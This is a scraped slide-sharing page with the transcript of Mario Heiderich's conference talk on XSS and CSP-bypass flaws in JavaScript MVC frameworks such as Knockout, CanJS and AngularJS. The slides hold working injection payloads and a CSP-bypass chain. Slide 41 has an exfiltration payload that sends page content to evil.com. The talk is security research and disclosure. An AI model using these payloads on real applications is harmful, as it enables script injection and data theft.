09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
 
Security on Rails
Security on RailsSecurity on Rails
Security on Rails
 
EP2016 - Moving Away From Nodejs To A Pure Python Solution For Assets
EP2016 - Moving Away From Nodejs To A Pure Python Solution For AssetsEP2016 - Moving Away From Nodejs To A Pure Python Solution For Assets
EP2016 - Moving Away From Nodejs To A Pure Python Solution For Assets
 
Introduction of angular js
Introduction of angular jsIntroduction of angular js
Introduction of angular js
 
Angular JS, steal the idea
Angular JS, steal the ideaAngular JS, steal the idea
Angular JS, steal the idea
 
Dive into AngularJS and directives
Dive into AngularJS and directivesDive into AngularJS and directives
Dive into AngularJS and directives
 

More from Mario Heiderich

Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Mario Heiderich
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT Security
Mario Heiderich
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
Mario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
Mario Heiderich
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
Mario Heiderich
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
Mario Heiderich
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
Mario Heiderich
 

More from Mario Heiderich (8)

Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT Security
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
 
I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!
 

Recently uploaded

Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 

Recently uploaded (20)

Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 

JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks

  • 1. JSMVCOMFG To sternly look at JavaScript MVC and Templating Frameworks A presentation by Mario Heiderich mario@cure53.de || @0x6D6172696F
  • 2. Infosec Hobgoblin ● Dr.-Ing. Mario Heiderich ● Researcher and Post-Doc, Ruhr-Uni Bochum – ● PhD Thesis on Client Side Security and Defense Founder of Cure53 – – Consulting, Workshops, Trainings – ● Penetration Testing Firm Simply the Best Company of the World Published author and international speaker – Specialized in HTML5 and SVG Security – JavaScript, XSS and Client Side Attacks ● HTML5 Security Cheatsheet ● And something new! – @0x6D6172696F – mario@cure53.de
  • 3. Today ● JavaScript MVC & Templating Frameworks ● Why? Because they are becoming popular ● Yes, we have numbers, wait for it... ● And they are special ● Are there security flaws? ● If yes (heh.. if..) what can we learn from them?
  • 4.
  • 5. What are they ● Written in JavaScript ● Often huge ● Often very complex ● Often maintained by corporations ● Interfaces to enable different coding styles ● Extending, optimizing, changing ● The way developers work with JavaScript ● The way web applications used to work
  • 6.
  • 7. What do they do? ● Claims ● ● ● ● “More productive out of the box” EmberJS “AngularJS lets you extend HTML vocabulary for your application” AngularJS “Fast templates, responsive widgets” “Simple and intuitive, powerful and extensible, lightning fast” JsRender CanJS
  • 8. Examples <script type="text/x-handlebars"> {{outlet}} </script> <script type="text/x-handlebars" id="x"> <h1>People</h1> <ul> {{#each model}} <li>Hello, <b>{{fullName}}</b>! </li> App = Ember.Application.create(); App.Person = Ember.Object.extend({ firstName: null, lastName: null, fullName: function() { return this.get('firstName') + " " + this.get('lastName'); }.property('firstName', 'lastName') }); App.IndexRoute = Ember.Route.extend({ model: function() { var people = [ {{/each}} App.Person.create({ </ul> firstName: "Frank", </script> lastName: "N. Stein" }) ]; return people; }});
  • 9. Examples <!doctype html> <html ng-app> <head> <script src="angular.min.js"></script> </head> <body> <div> <label>Name:</label> <input type="text" ng-model="yourName" placeholder="Your name"> <hr> <h1>Hello {{yourName}}!</h1> </div> </body> </html>
  • 10. Examples <div class="liveExample" id="x"> <select data-bind="options: tickets, optionsCaption: 'Choose...', optionsText: 'name', value: chosenTicket"> <option value="">Economy</option> <option value="">Business</option> <option value="">First Class</option> </select> <button data-bind="enable: chosenTicket, click: resetTicket" disabled="">Clear</button> <p data-bind="with: chosenTicket"></p> <script type="text/javascript"> function TicketsViewModel() { this.tickets = [ { name: "Economy", price: 199.95 }, { name: "Business", price: 449.22 }, { name: "First Class", price: 1199.99 } ]; this.chosenTicket = ko.observable(); this.resetTicket = function() { this.chosenTicket(null) } } ko.applyBindings(new TicketsViewModel(), document.getElementById("x")); </script> </div> Binding stuff Raw Data! Puttin' it togetha
  • 11. So.. ● JSMVC Frameworks do the following ● They extend the DOM ● They “abstractify” the DOM ● They provide new interfaces ● They often use script-templates or “data blocks” “The script element allows authors to include HTML5 HTML5 Approved! Approved! dynamic script and data blocks in their documents.” – – Sometimes ERB-style – ● Often Mustache-style Sometimes something completely different They often use markup-sugar – Custom elements, <hellokitty> – HTML5 data attributes WHATWG
  • 12.
  • 13.
  • 14. Mustache ● Specified in 2009 by Wanstrath ● {{ stuff }} ● {{#is_true}} Bla {{/is_true}
  • 15. JSMVC and Security ● Initial rationale for security research ● ● ● It's trending, it's complex, it's different What else do we need... nothing Poke-first, analyze later ● ● ● Pick a target, thanks TodoMVC! Explore debugging possibilities Goal: Execute arbitrary JavaScript, maybe more ● ● Using otherwise uncommon ways ● ● Using the JSMVC capabilities Assume injection, assume conventional XSS filter After poking, derive a metric for JSMMVC security
  • 16. Pokes ● Why not start with KnockoutJS <script src="knockout-2.3.0.js"></script> <div data-bind="x:alert(1)" /> <script> ko.applyBindings(); </script>
  • 17. Wait... ● JavaScript from within a data-attribute? ● No extra magic, just the colon? ● That's right ● See where we are heading with this? ● Knockout knocks out XSS filters ● ● Chrome's XSS Auditor ● ● IE's XSS Filter Anything that allows data attributes This behavior breaks existing security assumptions!
  • 18.
  • 19. The reason ● “eval” via “Function” parseBindingsString: function(b, c, d) { try { var f; if (!(f = this.Na[b])) { var g = this.Na, e, m = "with($context){with($data||{}){return{" + a.g.ea(b) + "}}}"; e = new Function("$context", "$element", m); f = g[b] = e } return f(c, d) } catch (h) { throw h.message = "Unable to parse bindings.nBindings value: " + b + "nMessage: " + h.message, h; } }
  • 20. Keep pokin' ● CanJS for example <script src="jquery-2.0.3.min.js"></script> <script src="can.jquery.js"></script> <body> <script type="text/ejs" id="todoList"> <%==($a)->abc})-alert(1)-can.proxy(function(){%> </script> <script> can.view('todoList', {}); </script> </body>
  • 21. Reason ● A copy of “eval” called “myEval” myEval = function(script) { eval(script); }, [...] var template = buff.join(''), out = { out: 'with(_VIEW) { with (_CONTEXT) {' + template + " " + finishTxt + "}}" }; // Use `eval` instead of creating a function, because it is easier to debug. myEval.call(out, 'this.fn = (function(_CONTEXT,_VIEW){' + out.out + '});rn//@ sourceURL=' + name + ".jjs"); return out;
  • 22. And even more... <script src="jquery-1.7.1.min.js"></script> <script src="kendo.all.min.js"></script> <div id="x"># alert(1) #</div> <script> var template = kendo.template($("#x").html()); var tasks = [{ id: 1}]; var dataSource = new kendo.data.DataSource({ data: tasks }); dataSource.bind("change", function(e) { var html = kendo.render(template, this.view()); }); dataSource.read(); </script>
  • 23. Keeeeep Pokin' ● AngularJS 1.1.x <script src="angular.min.js"></script> <div class="ng-app"> {{constructor.constructor('alert(1)')()}} </div> ● Or this – even with encoded mustaches <script src="angular.min.js"></script> <div class="ng-app"> &#x7b;&#x7b;constructor.constructor('alert(1)')()&#x7d;&#x7d; </div>
  • 24. Reason ● “eval” via “Function” var code = 'var l, fn, p;n'; forEach(pathKeys, function(key, index) { code += 'if(s === null || s === undefined) return s;n' + 'l=s;n' + 's=' + (index // we simply dereference 's' on any .dot notation ? 's' // but if we are first then we check locals first, and if so read it first : '((k&&k.hasOwnProperty("' + key + '"))?k:s)') + '["' + key + '"]' + ';n' + […] '}n' + ' s=s.$$vn' + '}n'; }); code += 'return s;'; fn = Function('s', 'k', code); // s=scope, k=locals fn.toString = function() { return code; };
  • 25. Sadly for the attacker... ● They fixed it in 1.2.x ● Dammit! ● Good test-cases too! Look... ● function ensureSafeObject(obj, fullExpression) { // nifty check if obj is Function that is fast … other contexts if (obj && obj.constructor === obj) { throw $parseMinErr('isecfn', 'Referencing Function in Angular expressions is disallowed!Expression: {0}', fullExpression); } else { return obj; }
  • 26. Not that hard to solve var foo = {}; foo.bar = 123; foo.baz = 456; console.log(foo.hasOwnProperty('bar')); console.log(foo.hasOwnProperty('baz')); console.log(foo.hasOwnProperty('constructor')); console.log(foo.hasOwnProperty('__proto__')); console.log(foo.hasOwnProperty('prototype')); // // // // // true true false false false
  • 27.
  • 28. CSP ● Most of the JSMVC will not work with CSP ● At least not without unsafe-eval ● That's not gonna help evangelize CSP ● Although there's hope – AngularJS
  • 29. <div ng-app ng-csp> <div ng-app ng-csp>
  • 30. AngularJS ● Features a special CSP mode ● Said to be 30% slower ● But enables AngularJS to work ● Even without unsafe-eval or other nasties ● ● Magick! It also brings back script injections
  • 31. <?php header('X-Content-Security-Policy: default-src 'self'); header('Content-Security-Policy: default-src 'self'); header('X-Webkit-CSP: default-src 'self'); ?> <!doctype html> <html ng-app ng-csp> <head> <script src="angular.min.js"></script> </head> <body onclick="alert(1)"> Click me <h1 ng-mouseover="$event.view.alert(2)"> Hover me </h1> </body> Proper CSP!
  • 32. How do they do it? I. Parse the “ng”-attributes II. Slice out the relevant parts III. Create anonymous functions IV. Connect them with events V. Wait for event handler to fire $element.onclick=function($event){ $event['view']['alert']('1') } ● It's technically not in-line ● Neither is any “eval” being used
  • 33. So, enabling the JSMVC to work with CSP (partly) kills the protection CSP delivers? Aw, yeah, being a pen-tester these days!
  • 34. “Packaged apps deliver an experience as capable as a native app, but as safe as a web page. Just like web apps, packaged apps are written in HTML5, JavaScript, and CSS.” Uhm...
  • 35. “Packaged apps have access to Chrome APIs and services not available to traditional web sites. You can build powerful apps that interact with network and hardware devices, media tools, and much more.” :-O
  • 36. It's bad “Ever played with Chrome Packaged Apps?” ● Very powerful tools ● Similar yet not equivalent to extensions ● Melting the barrier between web and desktop ● HTML + JS + many APIs ● CSP enabled by default ● And work great with AngularJS (of course)
  • 37. Doing the Nasty ● Let's bypass CSP in CPA using Angular ● And escalate some privileges
  • 38. Benign The HTML of <!doctype html> <html ng-app ng-csp> <head> <script src="angular.min.js"></script> <script src="controller.js"></script> <link rel="stylesheet" href="todo.css"> </head> <body> <h2>Todo</h2> <div ng-controller="TodoCtrl"> <span>{{remaining()}} of {{todos.length}} remaining</span> [ <a href="" ng-click="archive()">archive</a> ] <ul class="unstyled"> <li ng-repeat="todo in todos"> <input type="checkbox" ng-model="todo.done"> <span class="done-{{todo.done}}">{{todo.text}}</span> </li> </ul> </div> </body> </html> our fancy app
  • 39. Benign function TodoCtrl($scope) { $scope.todos = [ {text:'learn angular', done:true}, {text:'build an angular app', done:false}]; $scope.remaining = function() { var count = 0; angular.forEach($scope.todos, function(todo) { count += todo.done ? 0 : 1; }); return count; }; $scope.archive = function() { var oldTodos = $scope.todos; $scope.todos = []; angular.forEach(oldTodos, function(todo) { if (!todo.done) $scope.todos.push(todo); }); }; } Our Controller Code, AngularJS
  • 40. Benign { "manifest_version": 2, "name": "Lab3b MVC with controller", "permissions": ["webview"], "version": "1", "app": { "background": { "scripts": ["main.js"] } }, "icons": { "128": "icon.png" } } The Manifest, Permissions too
  • 41. Attacked <!doctype html> <html ng-app ng-csp> <head> <script src="angular.min.js"></script> <script src="controller.js"></script> <link rel="stylesheet" href="todo.css"> </head> <body> <h2 ng-click="invalid( w=$event.view, x=w.document.createElement('webview'), x.src='http://evil.com/?'+w.btoa(w.document.body.innerHTML), w.document.body.appendChild(x) )">Todo-shmoodoo</h2> <div ng-controller="TodoCtrl"> <span>{{remaining()}} of {{todos.length}} remaining</span> [ <a href="" ng-click="archive()">archive</a> ] <ul class="unstyled"> <li ng-repeat="todo in todos"> <input type="checkbox" ng-model="todo.done"> <span class="done-{{todo.done}}">{{todo.text}}</span> </li> </ul> </div> </body> </html> Oh, Sh*t!
  • 42.
  • 43.
  • 44.
  • 45. Happy testing – there's a lot more to find!
  • 46. For example this... <div class="ng-include:'//ø.pw'">
  • 47. More CSP Bypasses ● And even a much better one ● ● Upload a GIF ● ● Inject a class attribute Get a free AngularJS + HTML5 CSP Bypass Wanna see?
  • 48. Let's upload a pic! <span class="ng-include:'test.gif'"> </span> Now we inject a class attribute It's a valid GIF but also contains payload! – including the image as HTML! Now it imports itself <link rel="import" href="test.gif"> Thereby loads itself as JS <script src="test.gif"></script> “And pop goes the weasel”
  • 49. “It looks like we will agree to disagree on the importance of the HTML imports issue -- we don't think it's possible for a third party to execute arbitrary Javascript via the process you describe, so the risk of unsanitized HTML would be one that the developer was taking on deliberately.”
  • 50. Quick Recap ● What have we seen today ● Rotten Markup-Sugar ● JavaScript exec. from data-attributes ● JavaScript exec. from any element ● JavaScript exec. within encoded mustache ● A full-blown CSP Bypass ● The reasons for all these ● Oh – and an attack against Chrome Packaged Apps ● And it was just the tip of the iceberg ● Lots of “eval” and bad coding practices
  • 51.
  • 53. Metrics ● While root causes persist, new challenges arise ● We need to build metrics ● After having analyzed 12 frameworks: Here's a proposal {}SEC-A Are template expressions equivalent to a JavaScript eval? {}SEC-B Is the the execution scope well isolated or sand-boxed? {}SEC-C Can arbitrary HTML elements serve as template containers? {}SEC-D Does the framework allow, encourage or even enforce separation of code and content? {}SEC-E Does the framework maintainer have a security response program? {}SEC-F Does the Framework allow safe CSP rules to be used
  • 54.
  • 55. Conclusion ● JSMVC requires new security requirements ● No reflected content from the server within template containers ● Sometimes, everything is a template container ● Strict separation is necessary ● And there is hope! ● Maybe JSMVC eliminates XSS ● Because it changes how we design applications. ● And does by boosting and not hindering productivity ● Interested in collaborating on this? Contact me!